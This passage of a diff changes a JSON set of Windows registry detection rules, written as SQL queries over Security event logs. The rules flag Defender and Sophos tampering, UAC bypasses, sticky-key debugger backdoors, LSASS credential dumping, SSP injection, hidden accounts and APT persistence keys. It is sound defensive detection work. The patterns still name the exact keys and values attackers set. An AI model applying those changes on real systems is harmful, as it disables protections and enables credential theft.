"registry_event_hybridconnectionmgr_svc_installation.yml" }, { - "title": "New DNS ServerLevelPluginDll Installed", - "id": "e61e8a88-59a9-451c-874e-70fcc9740d67", + "title": "Potential Ransomware Activity Using LegalNotice Message", + "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", "status": "experimental", - "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.impact", + "attack.t1491.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\services\\\\DNS\\\\Parameters\\\\ServerLevelPluginDll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (NewValue LIKE '%encrypted%' ESCAPE '\\' OR NewValue LIKE '%Unlock-Password%' ESCAPE '\\' OR NewValue LIKE '%paying%' ESCAPE '\\'))" ], - "filename": "registry_set_dns_server_level_plugin_dll.yml" + "filename": "registry_set_legalnotice_susp_message.yml" }, { - "title": "Hiding User Account Via SpecialAccounts Registry Key", - "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", + "title": "Windows Credential Editor Registry", + "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", "status": "test", - "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects the use of Windows Credential Editor (WCE)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.002" + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' ESCAPE '\\')" ], - "filename": "registry_set_special_accounts.yml" + "filename": "registry_event_hack_wce_reg.yml" }, { - "title": "Disable Windows Defender Functionalities Via Registry Keys", - "id": "0eb46774-f1ab-4a74-8238-1155855f2263", - "status": "experimental", - "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", - "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", + "title": "Security Support Provider (SSP) Added to LSA Configuration", + "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "status": "test", + "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", + "author": "iwillkeepwatch", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1547.005" ], "falsepositives": [ - "Administrator actions" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" ], - "filename": "registry_set_windows_defender_tamper.yml" + "filename": "registry_event_ssp_added_lsa_config.yml" }, { - "title": "PowerShell as a Service in Registry", - "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", + "title": "PrinterNightmare Mimimkatz Driver Name", + "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", "status": "test", - "description": "Detects that a powershell code is written to the registry as a service.", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", + "author": "Markus Neis, @markus_neis, Florian Roth", "tags": [ "attack.execution", - "attack.t1569.002" + "attack.t1204", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ - "Unknown" + "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" ], - "filename": "registry_set_powershell_as_service.yml" + "filename": "registry_event_mimikatz_printernightmare.yml" }, { - "title": "Outlook Macro Execution Without Warning Setting Enabled", - "id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", - "status": "test", - "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", - "author": "@ScoubiMtl", + "title": "CMSTP Execution Registry Event", + "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Unlikely" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND NewValue LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" ], - "filename": "registry_set_office_outlook_enable_macro_execution.yml" + "filename": "registry_event_cmstp_execution_by_registry.yml" }, { - "title": "Bypass UAC Using DelegateExecute", - "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", + "title": "OilRig APT Registry Persistence", + "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", "status": "test", - "description": "Bypasses User Account Control using a fileless method", - "author": "frack113", + "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.privilege_escalation", + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", "attack.defense_evasion", - "attack.t1548.002" + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND NewValue = '(Empty)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" ], - "filename": "registry_set_bypass_uac_using_delegateexecute.yml" + "filename": "registry_event_apt_oilrig_mar18.yml" }, { - "title": "Change User Account Associated with the FAX Service", - "id": "e3fdf743-f05b-4051-990a-b66919be1743", - "status": "experimental", - "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", - "author": "frack113", + "title": "WINEKEY Registry Modification", + "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", + "status": "test", + "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", + "author": "omkar72", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (NewValue LIKE '%NetworkService%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" ], - "filename": "registry_set_fax_change_service_user.yml" + "filename": "registry_event_runkey_winekey.yml" }, { - "title": "Potential Persistence Via COM Hijacking From Suspicious Locations", - "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", + "title": "Creation of a Local Hidden User Account by Registry", + "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", "status": "experimental", - "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Sysmon registry detection of a local hidden user account.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1546.015" + "attack.t1136.001" ], "falsepositives": [ - "Probable legitimate applications. If you find these please add them to an exclusion list" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%appdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" + "filename": "registry_event_add_local_hidden_user.yml" }, { - "title": "Changing RDP Port to Non Standard Number", - "id": "509e84b9-a71a-40e0-834f-05470369bd1e", + "title": "Leviathan Registry Key Activity", + "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", "status": "test", - "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", - "author": "frack113", + "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", + "author": "Aidan Bracher", "tags": [ "attack.persistence", - "attack.t1547.010" - ], - "falsepositives": [ - "Unknown" + "attack.t1547.001" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (NewValue = 'DWORD (0x00000d3d)'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" ], - "filename": "registry_set_change_rdp_port.yml" + "filename": "registry_event_apt_leviathan.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits", - "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", + "title": "Sticky Key Like Backdoor Usage - Registry", + "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", "status": "experimental", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S, frack113", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((NewValue LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR NewValue LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" ], - "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "registry_event_stickykey_like_backdoor.yml" }, { - "title": "Potential AutoLogger Sessions Tampering", - "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", - "status": "experimental", - "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Camera and Microphone Access", + "id": "62120148-6b7a-42be-8b91-271c04e281a3", + "status": "test", + "description": "Detects Processes accessing the camera and microphone from suspicious folder", + "author": "Den Iuzvyk", "tags": [ - "attack.defense_evasion" + "attack.collection", + "attack.t1125", + "attack.t1123" ], "falsepositives": [ - "Unknown" + "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE '%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE '%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" ], - "filename": "registry_set_disable_autologger_sessions.yml" + "filename": "registry_event_susp_mic_cam_access.yml" }, { - "title": "Potential AMSI COM Server Hijacking", - "id": "160d2780-31f7-4922-8b3a-efce30e63e96", - "status": "experimental", - "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "RedMimicry Winnti Playbook Registry Manipulation", + "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", + "status": "test", + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (NewValue LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" - ], - "filename": "registry_set_amsi_com_hijack.yml" - }, - { - "title": "Potential Persistence Via Excel Add-in - Registry", - "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", - "status": "experimental", - "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND NewValue LIKE '/R %' ESCAPE '\\' AND NewValue LIKE '%.xll' ESCAPE '\\')" - ], - "filename": "registry_set_persistence_xll.yml" - }, - { - "title": "Tamper With Sophos AV Registry Keys", - "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", - "status": "experimental", - "description": "Detects tamper attempts to sophos av functionality via registry key modification", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" ], - "filename": "registry_set_sophos_av_tamper.yml" + "filename": "registry_event_redmimicry_winnti_reg.yml" }, { - "title": "Registry Persitence via Service in Safe Mode", - "id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", + "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", + "id": "55e29995-75e7-451a-bef0-6225e2f13597", "status": "experimental", - "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", - "author": "frack113", + "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND NewValue = 'Service') AND NOT ((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" ], - "filename": "registry_set_add_load_service_in_safe_mode.yml" + "filename": "registry_event_silentprocessexit_lsass.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Registry", - "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "title": "Shell Open Registry Keys Manipulation", + "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1548.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND NewValue = 'Binary Data')" - ], - "filename": "registry_set_uac_bypass_wmp.yml" - }, - { - "title": "Disable Macro Runtime Scan Scope", - "id": 